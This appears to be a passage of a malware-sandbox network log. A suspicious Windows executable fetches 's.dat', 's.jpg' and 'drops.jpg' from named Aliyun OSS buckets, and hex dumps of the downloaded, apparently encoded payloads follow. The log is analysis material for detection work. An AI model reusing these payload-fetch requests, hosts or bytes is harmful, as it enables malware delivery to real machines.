                                                                                                           Server: AliyunOSS
                                                                                                           Date: Mon, 06 Jan 2025 03:43:35 GMT
                                                                                                           Content-Type: image/gif
                                                                                                           Content-Length: 3892010
                                                                                                           Connection: close
                                                                                                           x-oss-request-id: 677B5167F326DB3339A09661
                                                                                                           Accept-Ranges: bytes
                                                                                                           ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                                                                           Last-Modified: Sun, 05 Jan 2025 09:00:25 GMT
                                                                                                           x-oss-object-type: Normal
                                                                                                           x-oss-hash-crc64ecma: 3363616613234190325
                                                                                                           x-oss-storage-class: Standard
                                                                                                           x-oss-ec: 0048-00000104
                                                                                                           Content-Disposition: attachment
                                                                                                           x-oss-force-download: true
                                                                                                           Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                                                                           x-oss-server-time: 15
                                                    Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                                    2025-01-06 03:43:35 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                                    Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                                    2025-01-06 03:43:35 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                                    Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                                    2025-01-06 03:43:35 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                                    Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.9 | 49979 | 39.103.20.26 | 443 | 7580 | C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-06 03:43:44 UTC | 111 | OUT | GET /s.dat HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:43:44 UTC | 560 | IN | HTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:43:44 GMT
                                                    Content-Type: application/octet-stream
                                                    Content-Length: 28272
                                                    Connection: close
                                                    x-oss-request-id: 677B5170820F3F33301A2D7F
                                                    Accept-Ranges: bytes
                                                    ETag: "7C371D180E92F0A8A5F6224E68440683"
                                                    Last-Modified: Mon, 06 Jan 2025 03:43:19 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 6359000969942175972
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000113
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: fDcdGA6S8Kil9iJOaEQGgw==
                                                    x-oss-server-time: 24
                                                    2025-01-06 03:43:44 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                                    Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                                    2025-01-06 03:43:44 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                                    Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                                    2025-01-06 03:43:44 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                                    Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                                    2025-01-06 03:43:44 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                                    Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                                    2025-01-06 03:43:45 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                                    Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                    2025-01-06 03:43:45 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                    Data Ascii: ,$LDld=5}u]U
                                                    2025-01-06 03:43:45 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                                    Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                    2025-01-06 03:43:45 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 79 08 ee f5
                                                    Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSy


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.9 | 49980 | 39.103.20.26 | 443 | 7580 | C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-06 03:43:46 UTC | 111 | OUT | GET /s.jpg HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:43:46 UTC | 544 | IN | HTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:43:46 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 8299
                                                    Connection: close
                                                    x-oss-request-id: 677B517277F3A938345E5C41
                                                    Accept-Ranges: bytes
                                                    ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                    Last-Modified: Sun, 05 Jan 2025 09:00:14 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 692387538176721524
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000104
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                    x-oss-server-time: 19
                                                    2025-01-06 03:43:46 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                    Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                    2025-01-06 03:43:46 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                                                    Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                                    2025-01-06 03:43:46 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                                                    Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.9 | 49981 | 118.178.60.9 | 443 | 7688 | C:\Users\user\Documents\5oqa98.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-06 03:44:00 UTC | 114 | OUT | GET /drops.jpg HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:44:00 UTC | 545 | IN | HTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:44:00 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 37274
                                                    Connection: close
                                                    x-oss-request-id: 677B518053BCC63338CE75CC
                                                    Accept-Ranges: bytes
                                                    ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                    Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 9193697774326766004
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000105
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                    x-oss-server-time: 6
                                                    2025-01-06 03:44:00 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                    Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                    2025-01-06 03:44:00 UTC4096INData Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc
                                                    Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                    2025-01-06 03:44:00 UTC4096INData Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5
                                                    Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
